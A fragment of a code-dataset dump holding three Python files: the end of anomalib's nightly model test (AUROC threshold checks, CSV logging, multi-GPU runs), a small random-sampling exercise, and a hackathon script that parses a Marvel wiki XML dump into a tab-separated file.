thresholds[config.model.name][config.dataset.category]\n if \"optimization\" in config.keys() and \"nncf\" in config.optimization.keys() and config.optimization.nncf.apply:\n threshold = threshold.nncf\n if not (\n np.isclose(results[\"image_AUROC\"], threshold[\"image_AUROC\"], rtol=0.05)\n or (results[\"image_AUROC\"] >= threshold[\"image_AUROC\"])\n ):\n raise AssertionError(\n f\"results['image_AUROC']: {results['image_AUROC']} >= \"\n f\"threshold['image_AUROC']: {threshold['image_AUROC']}\"\n )\n\n if config.dataset.task == \"segmentation\":\n if not (\n np.isclose(results[\"pixel_AUROC\"], threshold[\"pixel_AUROC\"], rtol=0.05)\n or (results[\"pixel_AUROC\"] >= threshold[\"pixel_AUROC\"])\n ):\n raise AssertionError(\n f\"results['pixel_AUROC']:{results['pixel_AUROC']} >= \"\n f\"threshold['pixel_AUROC']:{threshold['pixel_AUROC']}\"\n )\n return results\n\n def _save_to_csv(self, config: Union[DictConfig, ListConfig], results: Dict):\n \"\"\"Save model results to csv. Useful for tracking model drift.\n\n Args:\n config (Union[DictConfig, ListConfig]): Model config which is also added to csv for complete picture.\n results (Dict): Metrics from trainer.test\n \"\"\"\n # Save results in csv for tracking model drift\n model_metrics = flatten_sweep_params(config)\n # convert dict, list values to string\n for key, val in model_metrics.items():\n if isinstance(val, (list, dict, ListConfig, DictConfig)):\n model_metrics[key] = str(val)\n for metric, value in results.items():\n model_metrics[metric] = value\n model_metrics_df = pd.DataFrame([model_metrics])\n\n result_path = Path(f\"tests/artifacts/{datetime.now().strftime('%m_%d_%Y')}.csv\")\n result_path.parent.mkdir(parents=True, exist_ok=True)\n if not result_path.is_file():\n model_metrics_df.to_csv(result_path)\n else:\n model_metrics_df.to_csv(result_path, mode=\"a\", header=False)\n\n def runner(self, run_configs, path, score_type, device_id):\n for model_name, nncf, category in run_configs:\n try:\n with tempfile.TemporaryDirectory() as project_path:\n # Fix seed\n seed_everything(42, workers=True)\n config, datamodule, model, trainer = setup_model_train(\n model_name=model_name,\n dataset_path=path,\n nncf=nncf,\n project_path=project_path,\n category=category,\n score_type=score_type,\n device=[device_id],\n )\n\n # test model metrics\n results = self._test_metrics(trainer=trainer, config=config, model=model, datamodule=datamodule)\n\n # test model load\n model_load_test(config=config, datamodule=datamodule, results=results)\n\n self._save_to_csv(config, results)\n except AssertionError as assertion_error:\n raise Exception(f\"Model: {model_name} NNCF:{nncf} Category:{category}\") from assertion_error\n\n def test_model(self, path=get_dataset_path(), score_type=None):\n run_configs = get_model_nncf_cat()\n with ProcessPoolExecutor(\n max_workers=torch.cuda.device_count(), mp_context=multiprocessing.get_context(\"spawn\")\n ) as executor:\n jobs = []\n for device_id, run_split in enumerate(\n range(0, len(run_configs), math.ceil(len(run_configs) / torch.cuda.device_count()))\n ):\n jobs.append(\n executor.submit(\n self.runner,\n run_configs[run_split : run_split + math.ceil(len(run_configs) / torch.cuda.device_count())],\n path,\n score_type,\n device_id,\n )\n )\n for job in jobs:\n try:\n job.result()\n except Exception as e:\n raise e\n","repo_name":"openvinotoolkit/anomalib","sub_path":"tests/nightly/models/test_model_nightly.py","file_name":"test_model_nightly.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":2572,"dataset":"github-code","pt":"78"} +{"seq_id":"72950744891","text":"__author__ = 'matthewburleson'\n\nimport random\n\ndef nchoices(iterable, number_of_items):\n my_list = []\n try:\n for i in range(0, number_of_items):\n my_list.append(random.choice(iterable))\n except:\n return None\n\n return my_list\n\nprint(nchoices(\"yesterday\", 4))\nprint(nchoices((1,2,3,4,5,6,7), 4))\nprint(nchoices(list('sdkfgjhlgkahga'), 4))\nprint(nchoices({\"a\": \"lfkjslk\", \"b\": \"something else\", \"c\": 4}, 2))","repo_name":"ingusmat/PythonExercises","sub_path":"Collections/nrandom.py","file_name":"nrandom.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9887597322","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 23 08:43:10 2019\n\n@author: xingg\n\"\"\"\n\nimport re\n\nxmlFile = open('..\\\\enmarveldatabase_pages_current.xml','r',encoding = 'utf-8')\n\nlines = xmlFile.readlines()\n\ncharacters = {}\ntemp = ['NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA']\ncid = ''\nlastLine = ''\n\nfor line in lines:\n \n #<title>\n if \"<title>\" in line:\n temp[0] = line.replace(' <title>','').replace('','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('<b>','').replace('</b>','')\n \n #1025\n if \"\" in lastLine and \" \" in line:\n cid = line.replace(' ','').replace('','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| RealName \n if \"| RealName\" in line and \"RealNameRef\" not in line and \"RealName2\" not in line:\n temp[1] = line.replace('| RealName = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| CurrentAlias\n if \"| CurrentAlias\" in line and \"| CurrentAlias2\" not in line and \"| CurrentAliasRef\" not in line and \"| CurrentAliasRef\" not in line:\n temp[2] = line.replace('| CurrentAlias = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Affiliation\n if \"| Affiliation\" in line:\n temp[3] = line.replace('| Affiliation = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Relatives\n if \"| Relatives\" in line:\n temp[4] = line.replace('| Relatives = ','').replace('| Relatives =','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Universe\n if \"| Universe\" in line:\n temp[5] = line.replace('| Universe = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Gender\n if \"| Gender\" in line:\n temp[6] = line.replace('| Gender = ','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Height\n if \"| Height\" in line and \"Height2\" not in line :\n temp[7] = line.replace('| Height = ','').replace('| Height =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Weight\n if \"| Weight\" in line and \"Weight2\" not in line:\n temp[8] = line.replace('| Weight = ','').replace('| Weight =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Eyes\n if \"| Eyes\" in line and \"Eyes2\" not in line:\n temp[9] = line.replace('| Eyes = ','').replace('| Eyes = ','').replace('| Eyes =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Hair\n if \"| Hair\" in line and \"Hair2\" not in line:\n temp[10] = line.replace('| Hair = ','').replace('| Hair = ','').replace('| Hair =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n #| Citizenship \n if \"| Citizenship\" in line and \"Citizenship2\" not in line and \"Citizenship3\" not in line:\n temp[11] = line.replace('| Citizenship = ','').replace('| Citizenship =\t','').replace('| Citizenship = ','').replace('| Citizenship =\t','').replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \t\n #| Quotation\n if \"| Quotation\" in line:\n temp[12] = line.replace('| Quotation = ','').replace('| Quotation = ','' ).replace('| Quotation = ','' ).replace('| Quotation = ','' ).replace('| Quotation = ','' ).replace('\\r\\n','').replace('\\n','').replace('<br>','').replace('&','').replace('"','\"').replace('</b>','').replace('<b>','')\n \n lastLine = line\n \n if '' in line:\n characters[cid] = temp\n temp = ['NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA','NA']\n cid = ''\n lastLine = ''\n \nwriteFile = open('..\\\\rawDataStep1.csv','w',encoding = 'utf-8')\n\nwriteFile.write(\"\\t\\t<RealName>\\t<CurrentAlias>\\t<Affiliation>\\t<Relatives>\\t<Universe>\\t<Gender>\\t<Height>\\t<Weight>\\t<Eyes>\\t<Hair>\\t<Citizenship>\\t<Quotation>\\n\")\nfor key,values in characters.items():\n writeFile.write(key+\"\\t\")\n for v in values:\n writeFile.write(v+\"\\t\")\n writeFile.write('\\n')\nwriteFile.close()","repo_name":"Uraniluib/CrimsonCode_Hackathon_Project","sub_path":"Code/DataProcessing/cleanData.py","file_name":"cleanData.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}